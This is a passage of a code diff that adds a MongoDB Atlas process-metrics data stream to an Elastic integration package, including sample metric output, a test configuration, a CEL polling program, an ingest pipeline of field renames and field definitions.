0.8374367234442, + "getmore": 1.34425467654, + "insert": 0.24442323654, + "query": 0.1456555474455228, + "repl": { + "cmd": 0.244556655421, + "delete": 0.00456765432333333, + "insert": 0.003333222133, + "update": 0.05837348438 + }, + "update": 0.047555753224433 + }, + "operation": { + "execution": { + "time": { + "cmd": { + "avg": { + "ms": 0.07347823122113 + } + }, + "read": { + "avg": { + "ms": 0.16234554981 + } + }, + "write": { + "avg": { + "ms": 0.24552345 + } + } + } + }, + "scan_and_order": 0.36373718112 + }, + "oplog": { + "master": { + "lag": { + "time_diff": { + "s": 2786665.435567 + } + }, + "time": { + "s": 2771288.8755 + } + }, + "rate": { + "gb_per_hour": 1.341E-4 + }, + "repl_lag": { + "s": 0.00134322 + }, + "slave": { + "lag": { + "master": { + "time": { + "s": 21.23442 + } + } + } + } + }, + "query": { + "executor": { + "scanned": 0.0033322145545511, + "scanned_objects": 0.2663211245776 + }, + "targeting": { + "scanned_objects_per_returned": 1.16235487878865, + "scanned_per_returned": 0.007346657774388 + } + }, + "restart": { + "in_last_hour": 6 + }, + "swap": { + "usage": { + "free": { + "max": { + "kb": 4193787.0000000005 + } + }, + "total": { + "free": 4193787.893244421, + "used": 511.8778888886 + }, + "used": { + "max": { + "kb": 511.9999888888 + } + } + } + }, + "system": { + "cpu": { + "guest": { + "max": { + "pct": 231.8657881111 + }, + "pct": 265.7363623321122 + }, + "iowait": { + "max": { + "pct": 111.335453221 + }, + "pct": 1.33334554555446 + }, + "irq": { + "max": { + "pct": 1.243556311245 + }, + "pct": 2.233235555 + }, + "kernel": { + "max": { + "pct": 13.3839493839467 + }, + "pct": 1.413822809117 + }, + "nice": { + "pct": 3.12455667777 + }, + "softirq": { + "max": { + "pct": 1.3880999000999 + }, + "pct": 0.09578823373226 + }, + "steal": { + "max": { + "pct": 13.9995777339999 + }, + "pct": 0.7125933648776 + }, + "user": { + "max": { + "pct": 0.233311345555 + }, + "pct": 19.94005994777666 + } + }, + "memory": { + "available": { + "kb": 1297178.4, + "max": { + "kb": 1287180 + } + }, + "free": { + "kb": 140886, + "max": { + "kb": 149138.8 + } + }, + "used": { + "kb": 567885.3, + "max": { + "kb": 1852490 + } + } + }, + "network": { + "in": 1345.89298711, + "max": { + "in": 176129.9111111111, + "out": 11789.7 + }, + "out": 737.89400083167 + }, + "normalized": { + "cpu": { + "guest": { + "max": { + "pct": 123.4435467577443 + }, + "pct": 122.332344335578 + }, + "iowait": { + "max": { + "pct": 0.7 + }, + "pct": 0.076625581546717 + }, + "irq": { + "max": { + "pct": 0.086543389996543 + }, + "pct": 0.18766632301 + }, + "kernel": { + "max": { + "pct": 8.78943256778111 + }, + "pct": 0.9222388999125745 + }, + "nice": { + "max": { + "pct": 0.89631899 + }, + "pct": 0.23488931133323 + }, + "softirq": { + "max": { + "pct": 0.5997002993456544 + }, + "pct": 0.06667564629406 + }, + "steal": { + "max": { + "pct": 3.0995004995004996 + }, + "pct": 0.4948211119340082 + }, + "user": { + "max": { + "pct": 23.87636632771 + }, + "pct": 2.09939880605 + } + } + } + }, + "ticket": { + "available": { + "read": { + "count": 127 + }, + "write": { + "count": 126 + } + } + } + }, + "process_id": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017" + } + } + ] +} \ No newline at end of file diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/system/test-default-config.yml b/packages/mongodb_atlas/data_stream/process/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..19fe7ae9a87 --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/system/test-default-config.yml @@ -0,0 +1,13 @@ +vars: + url: + - http://{{Hostname}}:{{Port}} + public_key: + - admin + private_key: + - MongoDB@123 +data_stream: + vars: + groupId: + - mongodb-group1 +input: cel +service: mongodbatlas diff --git a/packages/mongodb_atlas/data_stream/process/agent/stream/input.yml.hbs b/packages/mongodb_atlas/data_stream/process/agent/stream/input.yml.hbs new file mode 100644 index 00000000000..3dc4b922602 --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/agent/stream/input.yml.hbs @@ -0,0 +1,69 @@ +config_version: 2 +interval: {{period}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} +auth.digest: + user: {{public_key}} + password: {{private_key}} +resource.url: {{url}} +state: + group_id: {{groupId}} + want_more: false + page_num: 1 + query: /measurements?granularity=PT{{period}}&period=PT{{period}} +redact: + fields: ~ +program: | + ( + has(state.hostlist) && size(state.hostlist) > 0 ? + state + : + state.with(request("GET", state.url + "/api/atlas/v2/groups/" + state.group_id + "/processes?pageNum=" + string(state.page_num) + "&itemsPerPage=100").with({ + "Header": { + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+json"] + } + }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "hostlist": body.results.map(e, state.url + "/api/atlas/v2/groups/" + state.group_id + "/processes/" + e.id + state.query), + "next": 0, + "page_num": body.links.exists_one(res, res.rel == "next") ? int(state.page_num)+1 : 1 + }))) + ).as(state, state.next >= size(state.hostlist) ? {} : + request("GET", string(state.hostlist[state.next])).with({ + "Header": { + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+json"] + } + }).do_request().as(res, { + "events": bytes(res.Body).decode_json().as(f, f.with({"response": zip( + //Combining measurement names and actual values of measurement to generate `key : value` pairs. + f.measurements.map(m, m.name), + f.measurements.map(m, m.dataPoints.map(d, d.value).as(v, size(v) == 0 ? 0 : v[0])) + )}).drop(["measurements", "links"])), + "hostlist": (int(state.next)+1) < size(state.hostlist) ? state.hostlist : [], + "next": (int(state.next)+1) < size(state.hostlist) ? (int(state.next)+1) : 0, + "want_more": (int(state.next)+1) < size(state.hostlist) || state.page_num != 1, + "page_num": state.page_num, + "group_id": state.group_id, + "query": state.query, + }) + ) diff --git a/packages/mongodb_atlas/data_stream/process/elasticsearch/ingest_pipeline/default.yml b/packages/mongodb_atlas/data_stream/process/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..44a4506967e --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,582 @@ +--- +description: Pipeline for processing MongoDB Atlas process metrics. +processors: + - set: + field: ecs.version + value: 8.11.0 + - set: + field: event.kind + value: event + - set: + field: event.module + value: mongodb_atlas + - set: + field: event.category + value: ["process"] + - set: + field: event.type + value: ["info"] + - rename: + field: response.ASSERT_MSG + target_field: mongodb_atlas.process.assert.msg + ignore_missing: true + - rename: + field: response.ASSERT_REGULAR + target_field: mongodb_atlas.process.assert.regular + ignore_missing: true + - rename: + field: response.ASSERT_USER + target_field: mongodb_atlas.process.assert.user + ignore_missing: true + - rename: + field: response.ASSERT_WARNING + target_field: mongodb_atlas.process.assert.warning + ignore_missing: true + - rename: + field: response.BACKGROUND_FLUSH_AVG + target_field: mongodb_atlas.process.background_flush.avg + ignore_missing: true + - rename: + field: response.CACHE_DIRTY_BYTES + target_field: mongodb_atlas.process.cache.dirty.bytes + ignore_missing: true + - rename: + field: response.CACHE_BYTES_READ_INTO + target_field: mongodb_atlas.process.cache.read.bytes + ignore_missing: true + - rename: + field: response.CACHE_USED_BYTES + target_field: mongodb_atlas.process.cache.used.total.bytes + ignore_missing: true + - rename: + field: response.CACHE_BYTES_WRITTEN_FROM + target_field: mongodb_atlas.process.cache.write.bytes + ignore_missing: true + - rename: + field: response.CONNECTIONS + target_field: mongodb_atlas.process.connections + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.children.kernel.max.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.children.kernel.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.children.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.children.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.children.user.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.kernel.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.children.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.normalized.children.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.normalized.children.user.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.kernel.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.cpu.normalized.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.cpu.normalized.user.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_USER + target_field: mongodb_atlas.process.cpu.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_USER + target_field: mongodb_atlas.process.cpu.user.pct + ignore_missing: true + - rename: + field: response.CURSORS_TOTAL_OPEN + target_field: mongodb_atlas.process.cursor.open.total + ignore_missing: true + - rename: + field: response.CURSORS_TOTAL_TIMED_OUT + target_field: mongodb_atlas.process.cursor.timed_out.total + ignore_missing: true + - rename: + field: response.DB_DATA_SIZE_TOTAL + target_field: mongodb_atlas.process.database.size.total.bytes + ignore_missing: true + - rename: + field: response.DB_STORAGE_TOTAL + target_field: mongodb_atlas.process.database.storage.total.bytes + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_DELETED + target_field: mongodb_atlas.process.document.deleted + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_INSERTED + target_field: mongodb_atlas.process.document.inserted + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_RETURNED + target_field: mongodb_atlas.process.document.returned + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_UPDATED + target_field: mongodb_atlas.process.document.updated + ignore_missing: true + - rename: + field: response.FTS_PROCESS_CPU_KERNEL + target_field: mongodb_atlas.process.fts.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.FTS_PROCESS_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.fts.cpu.normalized.kernel.pct + ignore_missing: true + - rename: + field: response.FTS_PROCESS_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.fts.cpu.normalized.user.pct + ignore_missing: true + - rename: + field: response.FTS_PROCESS_CPU_USER + target_field: mongodb_atlas.process.fts.cpu.user.pct + ignore_missing: true + - rename: + field: response.FTS_DISK_UTILIZATION + target_field: mongodb_atlas.process.fts.disk.utilization.total.bytes + ignore_missing: true + - rename: + field: response.FTS_MEMORY_MAPPED + target_field: mongodb_atlas.process.fts.memory.mapped.total.bytes + ignore_missing: true + - rename: + field: response.FTS_MEMORY_RESIDENT + target_field: mongodb_atlas.process.fts.memory.resident.total.bytes + ignore_missing: true + - rename: + field: response.FTS_MEMORY_VIRTUAL + target_field: mongodb_atlas.process.fts.memory.virtual.total.bytes + ignore_missing: true + - rename: + field: response.GLOBAL_ACCESSES_NOT_IN_MEMORY + target_field: mongodb_atlas.process.global.access.not_in_memory + ignore_missing: true + - rename: + field: response.GLOBAL_LOCK_CURRENT_QUEUE_READERS + target_field: mongodb_atlas.process.global.lock.current_queue.reader.count + ignore_missing: true + - rename: + field: response.GLOBAL_LOCK_CURRENT_QUEUE_TOTAL + target_field: mongodb_atlas.process.global.lock.current_queue.total + ignore_missing: true + - rename: + field: response.GLOBAL_LOCK_CURRENT_QUEUE_WRITERS + target_field: mongodb_atlas.process.global.lock.current_queue.writer.count + ignore_missing: true + - rename: + field: response.GLOBAL_PAGE_FAULT_EXCEPTIONS_THROWN + target_field: mongodb_atlas.process.global.page_fault.exception_thrown + ignore_missing: true + - rename: + field: response.EXTRA_INFO_PAGE_FAULTS + target_field: mongodb_atlas.process.host.page_faults + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_ACCESSES + target_field: mongodb_atlas.process.index.btree.access.count + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_HITS + target_field: mongodb_atlas.process.index.btree.hits.count + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_MISS_RATIO + target_field: mongodb_atlas.process.index.btree.miss_ratio.count + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_MISSES + target_field: mongodb_atlas.process.index.btree.miss.count + ignore_missing: true + - rename: + field: response.JOURNALING_COMMITS_IN_WRITE_LOCK + target_field: mongodb_atlas.process.journaling.commits.write_lock + ignore_missing: true + - rename: + field: response.JOURNALING_MB + target_field: mongodb_atlas.process.journaling.mb + ignore_missing: true + - rename: + field: response.JOURNALING_WRITE_DATA_FILES_MB + target_field: mongodb_atlas.process.journaling.write.data_files.mb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.system.normalized.cpu.user.max.pct + ignore_missing: true + - rename: + field: response.COMPUTED_MEMORY + target_field: mongodb_atlas.process.memory.computed.mb + ignore_missing: true + - rename: + field: response.MEMORY_MAPPED + target_field: mongodb_atlas.process.memory.mapped.mb + ignore_missing: true + - rename: + field: response.MEMORY_RESIDENT + target_field: mongodb_atlas.process.memory.resident.mb + ignore_missing: true + - rename: + field: response.MEMORY_VIRTUAL + target_field: mongodb_atlas.process.memory.virtual.mb + ignore_missing: true + - rename: + field: response.NETWORK_BYTES_IN + target_field: mongodb_atlas.process.network.in + ignore_missing: true + - rename: + field: response.NETWORK_BYTES_OUT + target_field: mongodb_atlas.process.network.out + ignore_missing: true + - rename: + field: response.NETWORK_NUM_REQUESTS + target_field: mongodb_atlas.process.network.request.total + ignore_missing: true + - rename: + field: response.OPCOUNTER_CMD + target_field: mongodb_atlas.process.opcounter.cmd + ignore_missing: true + - rename: + field: response.OPCOUNTER_DELETE + target_field: mongodb_atlas.process.opcounter.delete + ignore_missing: true + - rename: + field: response.OPCOUNTER_GETMORE + target_field: mongodb_atlas.process.opcounter.getmore + ignore_missing: true + - rename: + field: response.OPCOUNTER_INSERT + target_field: mongodb_atlas.process.opcounter.insert + ignore_missing: true + - rename: + field: response.OPCOUNTER_QUERY + target_field: mongodb_atlas.process.opcounter.query + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_CMD + target_field: mongodb_atlas.process.opcounter.repl.cmd + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_DELETE + target_field: mongodb_atlas.process.opcounter.repl.delete + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_INSERT + target_field: mongodb_atlas.process.opcounter.repl.insert + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_UPDATE + target_field: mongodb_atlas.process.opcounter.repl.update + ignore_missing: true + - rename: + field: response.OPCOUNTER_UPDATE + target_field: mongodb_atlas.process.opcounter.update + ignore_missing: true + - rename: + field: response.OP_EXECUTION_TIME_COMMANDS + target_field: mongodb_atlas.process.operation.execution.time.cmd.avg.ms + ignore_missing: true + - rename: + field: response.OP_EXECUTION_TIME_READS + target_field: mongodb_atlas.process.operation.execution.time.read.avg.ms + ignore_missing: true + - rename: + field: response.OP_EXECUTION_TIME_WRITES + target_field: mongodb_atlas.process.operation.execution.time.write.avg.ms + ignore_missing: true + - rename: + field: response.OPERATIONS_SCAN_AND_ORDER + target_field: mongodb_atlas.process.operation.scan_and_order + ignore_missing: true + - rename: + field: response.OPLOG_MASTER_LAG_TIME_DIFF + target_field: mongodb_atlas.process.oplog.master.lag.time_diff.s + ignore_missing: true + - rename: + field: response.OPLOG_MASTER_TIME + target_field: mongodb_atlas.process.oplog.master.time.s + ignore_missing: true + - rename: + field: response.OPLOG_RATE_GB_PER_HOUR + target_field: mongodb_atlas.process.oplog.rate.gb_per_hour + ignore_missing: true + - rename: + field: response.OPLOG_REPLICATION_LAG + target_field: mongodb_atlas.process.oplog.repl_lag.s + ignore_missing: true + - rename: + field: response.OPLOG_SLAVE_LAG_MASTER_TIME + target_field: mongodb_atlas.process.oplog.slave.lag.master.time.s + ignore_missing: true + - rename: + field: response.QUERY_EXECUTOR_SCANNED + target_field: mongodb_atlas.process.query.executor.scanned + ignore_missing: true + - rename: + field: response.QUERY_EXECUTOR_SCANNED_OBJECTS + target_field: mongodb_atlas.process.query.executor.scanned_objects + ignore_missing: true + - rename: + field: response.QUERY_TARGETING_SCANNED_OBJECTS_PER_RETURNED + target_field: mongodb_atlas.process.query.targeting.scanned_objects_per_returned + ignore_missing: true + - rename: + field: response.QUERY_TARGETING_SCANNED_PER_RETURNED + target_field: mongodb_atlas.process.query.targeting.scanned_per_returned + ignore_missing: true + - rename: + field: response.RESTARTS_IN_LAST_HOUR + target_field: mongodb_atlas.process.restart.in_last_hour + ignore_missing: true + - rename: + field: response.MAX_SWAP_USAGE_FREE + target_field: mongodb_atlas.process.swap.usage.free.max.kb + ignore_missing: true + - rename: + field: response.SWAP_USAGE_FREE + target_field: mongodb_atlas.process.swap.usage.total.free + ignore_missing: true + - rename: + field: response.SWAP_USAGE_USED + target_field: mongodb_atlas.process.swap.usage.total.used + ignore_missing: true + - rename: + field: response.MAX_SWAP_USAGE_USED + target_field: mongodb_atlas.process.swap.usage.used.max.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_GUEST + target_field: mongodb_atlas.process.system.cpu.guest.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_GUEST + target_field: mongodb_atlas.process.system.cpu.guest.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_IOWAIT + target_field: mongodb_atlas.process.system.cpu.iowait.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_IOWAIT + target_field: mongodb_atlas.process.system.cpu.iowait.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_IRQ + target_field: mongodb_atlas.process.system.cpu.irq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_IRQ + target_field: mongodb_atlas.process.system.cpu.irq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_KERNEL + target_field: mongodb_atlas.process.system.cpu.kernel.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_KERNEL + target_field: mongodb_atlas.process.system.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_NICE + target_field: mongodb_atlas.process.system.cpu.nice.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.cpu.softirq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.cpu.softirq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_STEAL + target_field: mongodb_atlas.process.system.cpu.steal.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_STEAL + target_field: mongodb_atlas.process.system.cpu.steal.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_USER + target_field: mongodb_atlas.process.system.cpu.user.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_USER + target_field: mongodb_atlas.process.system.cpu.user.pct + ignore_missing: true + - rename: + field: response.SYSTEM_MEMORY_AVAILABLE + target_field: mongodb_atlas.process.system.memory.available.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_MEMORY_AVAILABLE + target_field: mongodb_atlas.process.system.memory.available.max.kb + ignore_missing: true + - rename: + field: response.SYSTEM_MEMORY_FREE + target_field: mongodb_atlas.process.system.memory.free.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_MEMORY_FREE + target_field: mongodb_atlas.process.system.memory.free.max.kb + ignore_missing: true + - rename: + field: response.SYSTEM_MEMORY_USED + target_field: mongodb_atlas.process.system.memory.used.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_MEMORY_USED + target_field: mongodb_atlas.process.system.memory.used.max.kb + ignore_missing: true + - rename: + field: response.SYSTEM_NETWORK_IN + target_field: mongodb_atlas.process.system.network.in + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NETWORK_IN + target_field: mongodb_atlas.process.system.network.max.in + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NETWORK_OUT + target_field: mongodb_atlas.process.system.network.max.out + ignore_missing: true + - rename: + field: response.SYSTEM_NETWORK_OUT + target_field: mongodb_atlas.process.system.network.out + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_GUEST + target_field: mongodb_atlas.process.system.normalized.cpu.guest.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_GUEST + target_field: mongodb_atlas.process.system.normalized.cpu.guest.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_IOWAIT + target_field: mongodb_atlas.process.system.normalized.cpu.iowait.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_IOWAIT + target_field: mongodb_atlas.process.system.normalized.cpu.iowait.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_IRQ + target_field: mongodb_atlas.process.system.normalized.cpu.irq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_IRQ + target_field: mongodb_atlas.process.system.normalized.cpu.irq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.system.normalized.cpu.kernel.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.system.normalized.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_NICE + target_field: mongodb_atlas.process.system.normalized.cpu.nice.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_NICE + target_field: mongodb_atlas.process.system.normalized.cpu.nice.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.normalized.cpu.softirq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.normalized.cpu.softirq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_STEAL + target_field: mongodb_atlas.process.system.normalized.cpu.steal.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_STEAL + target_field: mongodb_atlas.process.system.normalized.cpu.steal.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.system.normalized.cpu.user.pct + ignore_missing: true + - rename: + field: response.TICKETS_AVAILABLE_READS + target_field: mongodb_atlas.process.ticket.available.read.count + ignore_missing: true + - rename: + field: response.TICKETS_AVAILABLE_WRITE + target_field: mongodb_atlas.process.ticket.available.write.count + ignore_missing: true + - rename: + field: groupId + target_field: mongodb_atlas.group_id + ignore_missing: true + - rename: + field: processId + target_field: mongodb_atlas.process_id + ignore_missing: true + - rename: + field: hostId + target_field: mongodb_atlas.host_id + ignore_missing: true + - remove: + field: + - response + - start + - granularity + - end + - databaseName + ignore_missing: true + - set: + field: event.kind + value: pipeline_error + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false \ No newline at end of file diff --git a/packages/mongodb_atlas/data_stream/process/fields/base-fields.yml b/packages/mongodb_atlas/data_stream/process/fields/base-fields.yml new file mode 100644 index 00000000000..71df896d68c --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/fields/base-fields.yml @@ -0,0 +1,15 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: input.type + type: keyword + description: Type of Filebeat input. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/mongodb_atlas/data_stream/process/fields/fields.yml b/packages/mongodb_atlas/data_stream/process/fields/fields.yml new file mode 100644 index 00000000000..fdf161e93a6 --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/fields/fields.yml @@ -0,0 +1,835 @@ +- name: mongodb_atlas + type: group + fields: + - name: group_id + description: Identifier for the project of the event. + type: keyword + - name: host_id + description: Unique identifier of the host for the MongoDB process. + type: keyword + - name: process + type: group + fields: + - name: assert + type: group + fields: + - name: msg + description: The average rate of message asserts per second over the selected sample period. + type: double + metric_type: gauge + - name: regular + description: The average rate of regular asserts raised per second over the selected sample period. + type: double + metric_type: gauge + - name: user + description: The average rate of user asserts per second over the selected sample period. + type: double + metric_type: gauge + - name: warning + description: The average rate of warnings per second over the selected sample period. + type: double + metric_type: gauge + - name: background_flush.avg + description: Amount of data flushed in the background. + type: double + metric_type: gauge + - name: cache + type: group + fields: + - name: dirty.bytes + description: "Write - Amount of bytes in the WiredTiger storage engine cache." + type: double + metric_type: gauge + unit: byte + - name: read.bytes + description: "Read - Amount of bytes in the WiredTiger storage engine cache." + type: double + metric_type: gauge + unit: byte + - name: used.total.bytes + description: The total bytes cached in memory for serving reads and writes. + type: double + metric_type: gauge + unit: byte + - name: write.bytes + description: The maximum disk read latency value over the period specified by the metric granularity. + type: double + metric_type: gauge + unit: byte + - name: connections + description: Displays the total number of active connections to the database deployment. Monitor connections to determine whether the current connection limits are sufficient. + type: double + metric_type: gauge + - name: cpu + type: group + fields: + - name: children + type: group + fields: + - name: kernel + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by child processes in kernel space. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU children kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by child processes in user space. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU children user space for mongodb. + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by the MongoDB process itself in kernel space, handling system calls and hardware interrupts. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: normalized + type: group + fields: + - name: children + type: group + fields: + - name: kernel + type: group + fields: + - name: max.pct + description: Max children kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU children kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max children user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU children user space for mongodb. + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: Max kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU user space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by the MongoDB process itself in user space, executing application code and processing data. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU user space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: cursor + type: group + fields: + - name: open.total + description: The number of cursors that the server maintains for clients. + type: long + metric_type: gauge + - name: timed_out.total + description: The average rate of cursors that have timed out per second over the selected sample period. + type: double + metric_type: gauge + - name: database + type: group + fields: + - name: size.total.bytes + description: The amount of storage space in bytes that your stored data uses. + type: long + metric_type: gauge + unit: byte + - name: storage.total.bytes + description: Sum total of the compressed on-disk storage space allocated for document storage across all databases. + type: long + metric_type: gauge + unit: byte + - name: document + type: group + fields: + - name: deleted + description: Displays the documents deleted per second. + type: double + metric_type: gauge + - name: inserted + description: Displays the documents inserted per second. + type: double + metric_type: gauge + - name: returned + description: Displays the documents returned per second. + type: double + metric_type: gauge + - name: updated + description: Displays the documents updated per second. + type: double + metric_type: gauge + - name: fts + type: group + fields: + - name: cpu + type: group + fields: + - name: kernel.pct + description: The amount of CPU time spent by the Full-Text search process in kernel space. + type: double + metric_type: gauge + unit: percent + - name: normalized + type: group + fields: + - name: 